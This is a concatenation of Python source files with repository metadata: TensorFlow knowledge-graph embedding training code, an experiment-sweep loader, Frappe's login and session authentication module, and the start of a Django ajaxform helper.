self.ckga_attribute_optimizer = generate_optimizer(self.ckga_attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
    # --- The following methods define the intermediate combination --- #
def _define_common_space_learning_graph(self):
with tf.name_scope('cross_name_view_placeholder'):
self.cn_hs = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_name_view_lookup'):
final_cn_phs = tf.nn.embedding_lookup(self.ent_embeds, self.cn_hs)
cn_hs_names = tf.nn.embedding_lookup(self.name_embeds, self.cn_hs)
cr_hs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.cn_hs)
ca_hs = tf.nn.embedding_lookup(self.av_ent_embeds, self.cn_hs)
with tf.name_scope('cross_name_view_loss'):
self.cross_name_loss = self.args.cv_name_weight * alignment_loss(final_cn_phs, cn_hs_names)
self.cross_name_loss += alignment_loss(final_cn_phs, cr_hs)
self.cross_name_loss += alignment_loss(final_cn_phs, ca_hs)
self.cross_name_optimizer = generate_optimizer(self.args.cv_weight * self.cross_name_loss,
self.args.ITC_learning_rate,
opt=self.args.optimizer)
def _define_space_mapping_graph(self):
with tf.name_scope('final_entities_placeholder'):
self.entities = tf.placeholder(tf.int32, shape=[self.args.entity_batch_size, ])
with tf.name_scope('multi_view_entities_lookup'):
final_ents = tf.nn.embedding_lookup(self.ent_embeds, self.entities)
nv_ents = tf.nn.embedding_lookup(self.name_embeds, self.entities)
rv_ents = tf.nn.embedding_lookup(self.rv_ent_embeds, self.entities)
av_ents = tf.nn.embedding_lookup(self.av_ent_embeds, self.entities)
with tf.name_scope('mapping_loss'):
nv_space_mapping_loss = space_mapping_loss(nv_ents, final_ents, self.nv_mapping, self.eye_mat,
self.args.orthogonal_weight)
rv_space_mapping_loss = space_mapping_loss(rv_ents, final_ents, self.rv_mapping, self.eye_mat,
self.args.orthogonal_weight)
av_space_mapping_loss = space_mapping_loss(av_ents, final_ents, self.av_mapping, self.eye_mat,
self.args.orthogonal_weight)
self.shared_comb_loss = nv_space_mapping_loss + rv_space_mapping_loss + av_space_mapping_loss
opt_vars = [v for v in tf.trainable_variables() if v.name.startswith("shared")]
self.shared_comb_optimizer = generate_optimizer(self.shared_comb_loss,
self.args.learning_rate,
var_list=opt_vars,
opt=self.args.optimizer)
def eval_kg1_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.kg1.entities_list)
return embeds.eval(session=self.session)
def eval_kg2_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.kg2.entities_list)
return embeds.eval(session=self.session)
def eval_kg1_useful_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.useful_entities_list1)
return embeds.eval(session=self.session)
def eval_kg2_useful_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.useful_entities_list2)
return embeds.eval(session=self.session)
def save(self):
ent_embeds = self.ent_embeds.eval(session=self.session)
nv_ent_embeds = self.name_embeds.eval(session=self.session)
rv_ent_embeds = self.rv_ent_embeds.eval(session=self.session)
av_ent_embeds = self.av_ent_embeds.eval(session=self.session)
rel_embeds = self.rel_embeds.eval(session=self.session)
        att_embeds = self.attr_embeds.eval(session=self.session)
save_embeddings(self.out_folder, self.kgs, ent_embeds, nv_ent_embeds, rv_ent_embeds, av_ent_embeds,
rel_embeds, att_embeds)
    # --- The following methods train the multi-view embeddings --- #
def train_relation_view_1epo(self, epoch, triple_steps, steps_tasks, batch_queue, neighbors1, neighbors2):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
for steps_task in steps_tasks:
mp.Process(target=bat.generate_relation_triple_batch_queue,
args=(self.kgs.kg1.local_relation_triples_list, self.kgs.kg2.local_relation_triples_list,
self.kgs.kg1.local_relation_triples_set, self.kgs.kg2.local_relation_triples_set,
self.kgs.kg1.entities_list, self.kgs.kg2.entities_list,
self.args.batch_size, steps_task,
batch_queue, neighbors1, neighbors2, self.args.neg_triple_num)).start()
for i in range(triple_steps):
batch_pos, batch_neg = batch_queue.get()
batch_loss, _ = self.session.run(fetches=[self.relation_loss, self.relation_optimizer],
feed_dict={self.rel_pos_hs: [x[0] for x in batch_pos],
self.rel_pos_rs: [x[1] for x in batch_pos],
self.rel_pos_ts: [x[2] for x in batch_pos],
self.rel_neg_hs: [x[0] for x in batch_neg],
self.rel_neg_rs: [x[1] for x in batch_neg],
self.rel_neg_ts: [x[2] for x in batch_neg]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
random.shuffle(self.kgs.kg1.local_relation_triples_list)
random.shuffle(self.kgs.kg2.local_relation_triples_list)
end = time.time()
print('epoch {} of rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss, end - start))
def train_attribute_view_1epo(self, epoch, triple_steps, steps_tasks, batch_queue, neighbors1, neighbors2):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
for steps_task in steps_tasks:
mp.Process(target=generate_attribute_triple_batch_queue,
args=(self.predicate_align_model.attribute_triples_w_weights1,
self.predicate_align_model.attribute_triples_w_weights2,
self.predicate_align_model.attribute_triples_w_weights_set1,
self.predicate_align_model.attribute_triples_w_weights_set2,
self.kgs.kg1.entities_list, self.kgs.kg2.entities_list,
self.args.attribute_batch_size, steps_task,
batch_queue, neighbors1, neighbors2, 0)).start()
for i in range(triple_steps):
batch_pos, batch_neg = batch_queue.get()
batch_loss, _ = self.session.run(fetches=[self.attribute_loss, self.attribute_optimizer],
feed_dict={self.attr_pos_hs: [x[0] for x in batch_pos],
self.attr_pos_as: [x[1] for x in batch_pos],
self.attr_pos_vs: [x[2] for x in batch_pos],
self.attr_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
random.shuffle(self.predicate_align_model.attribute_triples_w_weights1)
random.shuffle(self.predicate_align_model.attribute_triples_w_weights2)
end = time.time()
print('epoch {} of att. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss, end - start))
    # --- The following methods train cross-kg identity inference --- #
def train_cross_kg_entity_inference_relation_view_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.batch_size))
batch_size = self.args.batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckge_relation_loss, self.ckge_relation_optimizer],
feed_dict={self.ckge_rel_pos_hs: [x[0] for x in batch_pos],
self.ckge_rel_pos_rs: [x[1] for x in batch_pos],
self.ckge_rel_pos_ts: [x[2] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg entity inference in rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_entity_inference_attribute_view_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.attribute_batch_size))
batch_size = self.args.attribute_batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckge_attribute_loss, self.ckge_attribute_optimizer],
feed_dict={self.ckge_attr_pos_hs: [x[0] for x in batch_pos],
self.ckge_attr_pos_as: [x[1] for x in batch_pos],
self.ckge_attr_pos_vs: [x[2] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg entity inference in attr. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_relation_inference_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.batch_size))
batch_size = self.args.batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckgp_relation_loss, self.ckgp_relation_optimizer],
feed_dict={self.ckgp_rel_pos_hs: [x[0] for x in batch_pos],
self.ckgp_rel_pos_rs: [x[1] for x in batch_pos],
self.ckgp_rel_pos_ts: [x[2] for x in batch_pos],
self.ckgp_rel_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg relation inference in rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_attribute_inference_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.attribute_batch_size))
batch_size = self.args.attribute_batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckga_attribute_loss, self.ckga_attribute_optimizer],
feed_dict={self.ckga_attr_pos_hs: [x[0] for x in batch_pos],
self.ckga_attr_pos_as: [x[1] for x in batch_pos],
self.ckga_attr_pos_vs: [x[2] for x in batch_pos],
self.ckga_attr_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg attribute inference in attr. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_shared_space_mapping_1epo(self, epoch, entities):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(entities) / self.args.entity_batch_size))
batch_size = self.args.entity_batch_size if steps > 1 else len(entities)
for i in range(steps):
batch_pos = random.sample(entities, batch_size)
batch_loss, _ = self.session.run(fetches=[self.shared_comb_loss, self.shared_comb_optimizer],
feed_dict={self.entities: batch_pos})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of shared space learning, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss,
end - start))
    # --- The following methods train cross-view inference --- #
def train_common_space_learning_1epo(self, epoch, entities):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(entities) / self.args.entity_batch_size))
batch_size = self.args.entity_batch_size if steps > 1 else len(entities)
for i in range(steps):
batch_pos = random.sample(entities, batch_size)
batch_loss, _ = self.session.run(fetches=[self.cross_name_loss, self.cross_name_optimizer],
feed_dict={self.cn_hs: batch_pos})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of common space learning, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss,
end - start))
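# --- Hedged editorial sketch (not part of the original model code) -----------
# Every train_*_1epo method above repeats the same mini-batch loop: sample a
# batch, run the matching loss/optimizer pair, and average the loss over the
# samples seen. The helper below restates that shared pattern generically. It
# assumes `session` is the live tf.Session, `loss_op`/`train_op` are a scalar
# loss tensor and its optimizer op, and `make_feed` maps a batch to the
# placeholders those ops expect; it is illustrative only.
def _run_one_epoch_sketch(session, loss_op, train_op, samples, batch_size, make_feed):
    steps = int(math.ceil(len(samples) / batch_size))
    batch_size = batch_size if steps > 1 else len(samples)
    epoch_loss, trained_samples_num = 0.0, 0
    for _ in range(steps):
        batch = random.sample(samples, batch_size)
        batch_loss, _ = session.run(fetches=[loss_op, train_op], feed_dict=make_feed(batch))
        epoch_loss += batch_loss
        trained_samples_num += len(batch)
    return epoch_loss / trained_samples_num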
| 60.767932 | 125 | 0.60259 |
4a1f7a78b6e4b2cd4817d5369393e5bea5682eb1 | 138 | py | Python | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
@dataclass
class State:
x: float
y: float
theta: float
speed: float
omega: float
| 11.5 | 33 | 0.65942 |
4a1f7aef028afe9632f01dede332782f2024cd7e | 5,427 | py | Python | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | null | null | null | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | null | null | null | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | 1 | 2021-08-31T20:16:49.000Z | 2021-08-31T20:16:49.000Z | from pathlib import Path
import json
import tensorflow as tf
from .loss import *
from .meta_experiment import MetaExperiment
class VaryPlayParamExperiment(MetaExperiment):
def __init__(self,
param_vals = None,
param_name = 'p_mutate',
save_location=None,
num_experiments_per_val=3,
name='vary_pm_experiment',
**experiment_kwargs):
self.name = name
self.param_name = param_name
self.num_experiments = len(param_vals)
self.experiments = [
{
param_name: val,
'experiment': MetaExperiment(
print_prehistory=self.print_history,
name=f'meta_experiment_{param_name}={val}',
export_location=None if save_location is None else \
f'{save_location}/{param_name}={val}',
num_experiments=num_experiments_per_val,
**{param_name: val, **experiment_kwargs}
),
'status': 'Not Run',
'results': None,
'index': i,
}
for i, val in enumerate(param_vals)
]
self.save_location = save_location
if save_location is not None:
self.load_history(save_location)
def get_experiment_results(self, meta_experiment):
return meta_experiment.results
def _get_results(self):
return [
item['results'] for item in self.experiments
]
def print_prehistory(self):
pass
def load_sub_experiment(self, experiment, path):
history_path = path / 'training_history.json'
history = json.load(history_path.open(mode='r'))
results_path = path / 'results.json'
if results_path.exists():
results = json.load(results_path.open(mode='r'))
else:
results = [
item['test_metrics'] for item in history
if 'test_metrics' in item
][-1]
config_path = path / 'config.json'
if config_path.exists():
config = json.load(config_path.open(mode='r'))
# assuming that the experiment is self-play
experiment.student.load_weights(str(path / 'agent_weights'))
else:
config = {'epochs_optimised': len(history)}
experiment.epoch = config['epochs_optimised']
experiment.training_history = history
experiment.results = results
return experiment
def load_meta_exp(self, meta_exp_path):
metadata = json.load((meta_exp_path / 'meta.json').open(mode='r'))
results = json.load((meta_exp_path / 'results.json').open(mode='r'))
if 'experiment_config' in metadata:
play_params = metadata['experiment_config']['play_params']
param_val = play_params[self.param_name]
elif self.param_name in metadata:
param_val = metadata[self.param_name]
i, *_ = [i for i, item in enumerate(self.experiments)
if item[self.param_name] == param_val]
self.experiments[i]['status'] = 'Complete'
self.experiments[i]['results'] = results
meta_exp = self.experiments[i]['experiment']
meta_exp.results = results
j = 0
for sub_exp_path in meta_exp_path.glob('*'):
try:
if not sub_exp_path.is_file():
sub_exp = meta_exp.experiments[j]['experiment']
meta_exp.experiments[j]['experiment'] = \
self.load_sub_experiment(sub_exp, sub_exp_path)
meta_exp.experiments[j]['status'] = 'Complete'
meta_exp.experiments[j]['results'] = \
meta_exp.experiments[j]['experiment'].results
j += 1
            except Exception:
                # skip directories that do not contain a loadable sub-experiment
                pass
def load_history(self, history_location):
exp_path = Path(history_location)
for meta_exp_path in exp_path.glob('*'):
results_path = meta_exp_path / 'results.json'
history_path = meta_exp_path / 'training_history.json'
if results_path.exists() or history_path.exists():
self.load_meta_exp(meta_exp_path)
def export_experiment(self, experiment):
if self.save_location is not None:
experiment_config = \
experiment.experiments[0]['experiment'].get_config()
i, *_ = [i for i, x in enumerate(self.experiments)
if x['experiment'] == experiment]
meta_data = {
'index': i,
'experiment_config': experiment_config
}
meta_data_path = \
Path(f'{experiment.export_location}/meta.json')
with meta_data_path.open(mode='w') as f:
json.dump(meta_data, f)
results_path = \
Path(f'{experiment.export_location}/results.json')
with results_path.open(mode='w') as f:
json.dump(experiment.results, f)
print('Saved experiment data at:',
experiment.export_location)
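# --- Hedged usage sketch (not part of the original module) -------------------
# A minimal illustration of how this class is constructed, based only on the
# __init__ signature above. Extra keyword arguments are forwarded to
# MetaExperiment, so the commented-out entry below is a purely hypothetical
# placeholder; nothing here is called automatically.
def _example_usage():
    experiment = VaryPlayParamExperiment(
        param_vals=[0.0, 0.1, 0.2],             # values swept for the play parameter
        param_name='p_mutate',                  # name of the varied play parameter
        save_location='results/vary_p_mutate',  # one sub-folder per parameter value
        num_experiments_per_val=3,
        # epochs=100,                           # hypothetical MetaExperiment kwarg
    )
    return experiment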
| 35.940397 | 76 | 0.544315 |
4a1f7b2be503079581a7bb5e4ff04a706223d3e1 | 13,937 | py | Python | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import datetime
from frappe import _
import frappe
import frappe.database
import frappe.utils
from frappe.utils import cint, flt, get_datetime, datetime, date_diff, today
import frappe.utils.user
from frappe import conf
from frappe.sessions import Session, clear_sessions, delete_session
from frappe.modules.patch_handler import check_session_stopped
from frappe.translate import get_lang_code
from frappe.utils.password import check_password, delete_login_failed_cache
from frappe.core.doctype.activity_log.activity_log import add_authentication_log
from frappe.twofactor import (should_run_2fa, authenticate_for_2factor,
confirm_otp_token, get_cached_user_pass)
from six.moves.urllib.parse import quote
class HTTPRequest:
def __init__(self):
# Get Environment variables
self.domain = frappe.request.host
if self.domain and self.domain.startswith('www.'):
self.domain = self.domain[4:]
if frappe.get_request_header('X-Forwarded-For'):
frappe.local.request_ip = (frappe.get_request_header('X-Forwarded-For').split(",")[0]).strip()
elif frappe.get_request_header('REMOTE_ADDR'):
frappe.local.request_ip = frappe.get_request_header('REMOTE_ADDR')
else:
frappe.local.request_ip = '127.0.0.1'
# language
self.set_lang()
# load cookies
frappe.local.cookie_manager = CookieManager()
# set db
self.connect()
# login
frappe.local.login_manager = LoginManager()
if frappe.form_dict._lang:
lang = get_lang_code(frappe.form_dict._lang)
if lang:
frappe.local.lang = lang
self.validate_csrf_token()
# write out latest cookies
frappe.local.cookie_manager.init_cookies()
# check status
check_session_stopped()
def validate_csrf_token(self):
if frappe.local.request and frappe.local.request.method in ("POST", "PUT", "DELETE"):
if not frappe.local.session: return
if not frappe.local.session.data.csrf_token \
or frappe.local.session.data.device=="mobile" \
or frappe.conf.get('ignore_csrf', None):
# not via boot
return
csrf_token = frappe.get_request_header("X-Frappe-CSRF-Token")
if not csrf_token and "csrf_token" in frappe.local.form_dict:
csrf_token = frappe.local.form_dict.csrf_token
del frappe.local.form_dict["csrf_token"]
if frappe.local.session.data.csrf_token != csrf_token:
frappe.local.flags.disable_traceback = True
frappe.throw(_("Invalid Request"), frappe.CSRFTokenError)
def set_lang(self):
from frappe.translate import guess_language
frappe.local.lang = guess_language()
def get_db_name(self):
"""get database name from conf"""
return conf.db_name
def connect(self, ac_name = None):
"""connect to db, from ac_name or db_name"""
frappe.local.db = frappe.database.get_db(user = self.get_db_name(), \
password = getattr(conf, 'db_password', ''))
class LoginManager:
def __init__(self):
self.user = None
self.info = None
self.full_name = None
self.user_type = None
if frappe.local.form_dict.get('cmd')=='login' or frappe.local.request.path=="/api/method/login":
if self.login()==False: return
self.resume = False
# run login triggers
self.run_trigger('on_session_creation')
else:
try:
self.resume = True
self.make_session(resume=True)
self.get_user_info()
self.set_user_info(resume=True)
except AttributeError:
self.user = "Guest"
self.get_user_info()
self.make_session()
self.set_user_info()
def login(self):
# clear cache
frappe.clear_cache(user = frappe.form_dict.get('usr'))
user, pwd = get_cached_user_pass()
self.authenticate(user=user, pwd=pwd)
if self.force_user_to_reset_password():
doc = frappe.get_doc("User", self.user)
frappe.local.response["redirect_to"] = doc.reset_password(send_email=False, password_expired=True)
frappe.local.response["message"] = "Password Reset"
return False
if should_run_2fa(self.user):
authenticate_for_2factor(self.user)
if not confirm_otp_token(self):
return False
self.post_login()
def post_login(self):
self.run_trigger('on_login')
validate_ip_address(self.user)
self.validate_hour()
self.get_user_info()
self.make_session()
self.set_user_info()
def get_user_info(self, resume=False):
self.info = frappe.db.get_value("User", self.user,
["user_type", "first_name", "last_name", "user_image"], as_dict=1)
self.user_type = self.info.user_type
def set_user_info(self, resume=False):
# set sid again
frappe.local.cookie_manager.init_cookies()
self.full_name = " ".join(filter(None, [self.info.first_name,
self.info.last_name]))
if self.info.user_type=="Website User":
frappe.local.cookie_manager.set_cookie("system_user", "no")
if not resume:
frappe.local.response["message"] = "No App"
frappe.local.response["home_page"] = get_website_user_home_page(self.user)
else:
frappe.local.cookie_manager.set_cookie("system_user", "yes")
if not resume:
frappe.local.response['message'] = 'Logged In'
frappe.local.response["home_page"] = "/desk#dashboard"
if not resume:
frappe.response["full_name"] = self.full_name
# redirect information
redirect_to = frappe.cache().hget('redirect_after_login', self.user)
if redirect_to:
frappe.local.response["redirect_to"] = redirect_to
frappe.cache().hdel('redirect_after_login', self.user)
frappe.local.cookie_manager.set_cookie("full_name", self.full_name)
frappe.local.cookie_manager.set_cookie("user_id", self.user)
frappe.local.cookie_manager.set_cookie("user_image", self.info.user_image or "")
def make_session(self, resume=False):
# start session
frappe.local.session_obj = Session(user=self.user, resume=resume,
full_name=self.full_name, user_type=self.user_type)
# reset user if changed to Guest
self.user = frappe.local.session_obj.user
frappe.local.session = frappe.local.session_obj.data
self.clear_active_sessions()
	def clear_active_sessions(self):
		"""Clear other sessions of the current user if `deny_multiple_sessions` is set"""
if not (cint(frappe.conf.get("deny_multiple_sessions")) or cint(frappe.db.get_system_setting('deny_multiple_sessions'))):
return
if frappe.session.user != "Guest":
clear_sessions(frappe.session.user, keep_current=True)
def authenticate(self, user=None, pwd=None):
if not (user and pwd):
user, pwd = frappe.form_dict.get('usr'), frappe.form_dict.get('pwd')
if not (user and pwd):
self.fail(_('Incomplete login details'), user=user)
if cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_mobile_number")):
user = frappe.db.get_value("User", filters={"mobile_no": user}, fieldname="name") or user
if cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_user_name")):
user = frappe.db.get_value("User", filters={"username": user}, fieldname="name") or user
self.check_if_enabled(user)
self.user = self.check_password(user, pwd)
def force_user_to_reset_password(self):
if not self.user:
return
reset_pwd_after_days = cint(frappe.db.get_single_value("System Settings",
"force_user_to_reset_password"))
if reset_pwd_after_days:
last_password_reset_date = frappe.db.get_value("User",
self.user, "last_password_reset_date") or today()
last_pwd_reset_days = date_diff(today(), last_password_reset_date)
if last_pwd_reset_days > reset_pwd_after_days:
return True
def check_if_enabled(self, user):
"""raise exception if user not enabled"""
doc = frappe.get_doc("System Settings")
if cint(doc.allow_consecutive_login_attempts) > 0:
check_consecutive_login_attempts(user, doc)
if user=='Administrator': return
if not cint(frappe.db.get_value('User', user, 'enabled')):
self.fail('User disabled or missing', user=user)
def check_password(self, user, pwd):
"""check password"""
try:
# returns user in correct case
return check_password(user, pwd)
except frappe.AuthenticationError:
self.update_invalid_login(user)
self.fail('Incorrect password', user=user)
def fail(self, message, user=None):
if not user:
user = _('Unknown User')
frappe.local.response['message'] = message
add_authentication_log(message, user, status="Failed")
frappe.db.commit()
raise frappe.AuthenticationError
def update_invalid_login(self, user):
last_login_tried = get_last_tried_login_data(user)
failed_count = 0
if last_login_tried > get_datetime():
failed_count = get_login_failed_count(user)
frappe.cache().hset('login_failed_count', user, failed_count + 1)
def run_trigger(self, event='on_login'):
for method in frappe.get_hooks().get(event, []):
frappe.call(frappe.get_attr(method), login_manager=self)
def validate_hour(self):
"""check if user is logging in during restricted hours"""
login_before = int(frappe.db.get_value('User', self.user, 'login_before', ignore=True) or 0)
login_after = int(frappe.db.get_value('User', self.user, 'login_after', ignore=True) or 0)
if not (login_before or login_after):
return
from frappe.utils import now_datetime
current_hour = int(now_datetime().strftime('%H'))
if login_before and current_hour > login_before:
frappe.throw(_("Login not allowed at this time"), frappe.AuthenticationError)
if login_after and current_hour < login_after:
frappe.throw(_("Login not allowed at this time"), frappe.AuthenticationError)
def login_as_guest(self):
"""login as guest"""
self.login_as("Guest")
def login_as(self, user):
self.user = user
self.post_login()
def logout(self, arg='', user=None):
if not user: user = frappe.session.user
self.run_trigger('on_logout')
if user == frappe.session.user:
delete_session(frappe.session.sid, user=user, reason="User Manually Logged Out")
self.clear_cookies()
else:
clear_sessions(user)
def clear_cookies(self):
clear_cookies()
class CookieManager:
def __init__(self):
self.cookies = {}
self.to_delete = []
def init_cookies(self):
if not frappe.local.session.get('sid'): return
# sid expires in 3 days
expires = datetime.datetime.now() + datetime.timedelta(days=3)
if frappe.session.sid:
self.cookies["sid"] = {"value": frappe.session.sid, "expires": expires}
if frappe.session.session_country:
self.cookies["country"] = {"value": frappe.session.get("session_country")}
def set_cookie(self, key, value, expires=None):
self.cookies[key] = {"value": value, "expires": expires}
def delete_cookie(self, to_delete):
if not isinstance(to_delete, (list, tuple)):
to_delete = [to_delete]
self.to_delete.extend(to_delete)
def flush_cookies(self, response):
for key, opts in self.cookies.items():
response.set_cookie(key, quote((opts.get("value") or "").encode('utf-8')),
expires=opts.get("expires"))
# expires yesterday!
expires = datetime.datetime.now() + datetime.timedelta(days=-1)
for key in set(self.to_delete):
response.set_cookie(key, "", expires=expires)
@frappe.whitelist()
def get_logged_user():
return frappe.session.user
def clear_cookies():
if hasattr(frappe.local, "session"):
frappe.session.sid = ""
frappe.local.cookie_manager.delete_cookie(["full_name", "user_id", "sid", "user_image", "system_user"])
def get_website_user_home_page(user):
home_page_method = frappe.get_hooks('get_website_user_home_page')
if home_page_method:
home_page = frappe.get_attr(home_page_method[-1])(user)
return '/' + home_page.strip('/')
elif frappe.get_hooks('website_user_home_page'):
return '/' + frappe.get_hooks('website_user_home_page')[-1].strip('/')
else:
return '/me'
def get_last_tried_login_data(user, get_last_login=False):
locked_account_time = frappe.cache().hget('locked_account_time', user)
if get_last_login and locked_account_time:
return locked_account_time
last_login_tried = frappe.cache().hget('last_login_tried', user)
if not last_login_tried or last_login_tried < get_datetime():
last_login_tried = get_datetime() + datetime.timedelta(seconds=60)
frappe.cache().hset('last_login_tried', user, last_login_tried)
return last_login_tried
def get_login_failed_count(user):
return cint(frappe.cache().hget('login_failed_count', user)) or 0
def check_consecutive_login_attempts(user, doc):
login_failed_count = get_login_failed_count(user)
last_login_tried = (get_last_tried_login_data(user, True)
+ datetime.timedelta(seconds=doc.allow_login_after_fail))
if login_failed_count >= cint(doc.allow_consecutive_login_attempts):
locked_account_time = frappe.cache().hget('locked_account_time', user)
if not locked_account_time:
frappe.cache().hset('locked_account_time', user, get_datetime())
if last_login_tried > get_datetime():
frappe.throw(_("Your account has been locked and will resume after {0} seconds")
.format(doc.allow_login_after_fail), frappe.SecurityException)
else:
delete_login_failed_cache(user)
def validate_ip_address(user):
"""check if IP Address is valid"""
user = frappe.get_cached_doc("User", user) if not frappe.flags.in_test else frappe.get_doc("User", user)
ip_list = user.get_restricted_ip_list()
if not ip_list:
return
system_settings = frappe.get_cached_doc("System Settings") if not frappe.flags.in_test else frappe.get_single("System Settings")
# check if bypass restrict ip is enabled for all users
bypass_restrict_ip_check = system_settings.bypass_restrict_ip_check_if_2fa_enabled
# check if two factor auth is enabled
if system_settings.enable_two_factor_auth and not bypass_restrict_ip_check:
# check if bypass restrict ip is enabled for login user
bypass_restrict_ip_check = user.bypass_restrict_ip_check_if_2fa_enabled
for ip in ip_list:
if frappe.local.request_ip.startswith(ip) or bypass_restrict_ip_check:
return
frappe.throw(_("Access not allowed from this IP Address"), frappe.AuthenticationError)
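# --- Hedged editorial note (not part of frappe/auth.py) ----------------------
# LoginManager.run_trigger above resolves dotted paths registered under hook
# names such as "on_session_creation", "on_login" and "on_logout", and calls
# each one with `login_manager=self`. A custom app would therefore register a
# hook roughly like the sketch below; the app name and module path are
# hypothetical placeholders.
#
#   # my_app/hooks.py
#   on_login = ["my_app.auth_hooks.after_login"]
#
#   # my_app/auth_hooks.py
#   def after_login(login_manager):
#       # e.g. inspect login_manager.user / full_name, set extra cookies,
#       # or write an audit record
#       ...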
| 33.26253 | 129 | 0.747291 |
4a1f7c0f89b6e45b67a8c013c2ed04ebe589bcbd | 1,724 | py | Python | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | null | null | null | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | 3 | 2021-03-19T23:45:25.000Z | 2022-03-21T22:21:12.000Z | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | null | null | null | '''
This module provides back-end Django utilities that make it
easier to interact with the front-end ajaxform component.
This module is tightly coupled to ajaxform.js.
'''
from django.core.urlresolvers import reverse
from django.http import JsonResponse, HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
def redirect(request, viewname):
'''
Redirect the request to the given URL pattern name or the callable
view object.
This can be called from a form-based view that handles both
    ajaxform-initiated ajax requests *and* browser-initiated requests.
The function will detect which client initiated the request and
act accordingly.
'''
